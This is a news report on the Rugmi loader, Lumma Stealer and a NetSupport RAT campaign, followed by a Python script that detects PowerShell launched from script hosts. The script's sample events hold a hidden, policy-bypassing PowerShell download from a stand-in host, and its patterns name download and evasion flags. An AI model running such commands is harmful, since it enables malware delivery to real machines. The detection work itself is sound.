A new malware loader is being used by threat actors to deliver a variety of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.
Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi.
“This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk,” the company said in its Threat Report H2 2023.
Telemetry data gathered by the company shows that detections for the Rugmi loader spiked in October and November 2023, surging from single-digit daily numbers to hundreds per day.
Stealer malware is typically sold under a malware-as-a-service (MaaS) model to other threat actors on a subscription basis. Lumma Stealer, for instance, is advertised in underground forums for $250 a month. The most expensive plan costs $20,000, but it also gives buyers access to the source code and the right to sell it.
There is evidence to suggest that the codebase associated with the Mars, Arkei, and Vidar stealers has been repurposed to create Lumma.
Besides continually adapting its tactics to evade detection, the off-the-shelf tool is distributed through several methods, ranging from malvertising to fake browser updates to cracked installations of popular software such as VLC media player and OpenAI ChatGPT.
Another technique concerns the use of Discord's content delivery network (CDN) to host and propagate the malware, as revealed by Trend Micro in October 2023.
This involves leveraging a combination of random and compromised Discord accounts to send direct messages to potential targets, offering them $10 or a Discord Nitro subscription in exchange for their help on a project.
Users who agree to the offer are then urged to download an executable file hosted on the Discord CDN that masquerades as iMagic Inventory but, in reality, contains the Lumma Stealer payload.
“Ready-made malware solutions contribute to the proliferation of malicious campaigns because they make the malware accessible even to potentially less technically skilled threat actors,” ESET said.
“Offering a broader range of functions then serves to render Lumma Stealer even more attractive as a product.”
The disclosures come as McAfee Labs disclosed a new variant of NetSupport RAT, which emerged from its legitimate progenitor NetSupport Manager and has since been put to use by initial access brokers to gather information and perform additional actions on victims of interest.
“The infection begins with obfuscated JavaScript files, serving as the initial point of entry for the malware,” McAfee said, adding that it highlights the “evolving tactics employed by cybercriminals.”
The execution of the JavaScript file advances the attack chain by running PowerShell commands to retrieve the remote control and stealer malware from an actor-controlled server. The campaign's primary targets include the U.S. and Canada.
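The JavaScript-to-PowerShell chain described above leaves a characteristic parent/child process lineage that defenders can hunt for. The following is an added example, not code from the article or from ESET or McAfee: it runs a simple detection over constructed Sysmon-style process-creation events (the field names, paths, and command lines are made up for illustration) and flags PowerShell launched by a Windows script host, raising the severity when the command line carries download or evasion indicators.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"iwr http://c2.invalid/a.bin -OutFile $env:TEMP\\a.bin\""},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign: launched by a user
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"ParentImage": r"C:\Windows\System32\cscript.exe",
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": "pwsh.exe -enc <constructed-base64-blob>"},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",  # script host, but no PowerShell child
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # the obfuscated-JS stage runs here
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line patterns typical of a PowerShell download/execute stage.
INDICATORS = {
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer|net\.webclient", re.I),
    "encoded": re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.I),
    "bypass_policy": re.compile(r"(^|\s)-(ep|executionpolicy)\s+bypass\b", re.I),
}

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def indicators_for(cmdline):
    """Names of the INDICATORS patterns that match the command line, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))

def detect_script_to_powershell(events):
    """Alert on PowerShell spawned by a script host; severity rises with command-line indicators."""
    alerts = []
    for ev in events:
        if basename(ev["ParentImage"]) not in SCRIPT_HOSTS:
            continue
        if basename(ev["Image"]) not in POWERSHELL:
            continue
        hits = indicators_for(ev["CommandLine"])
        severity = "high" if hits else "medium"   # the lineage alone is worth triage
        alerts.append({"severity": severity, "indicators": hits, "command": ev["CommandLine"]})
    return alerts

if __name__ == "__main__":
    for alert in detect_script_to_powershell(SAMPLE_EVENTS):
        print(alert["severity"], alert["indicators"], alert["command"])
```

Real deployments would also consider the signer of the script host's parent and the script file path, since legitimate logon scripts can produce the same lineage.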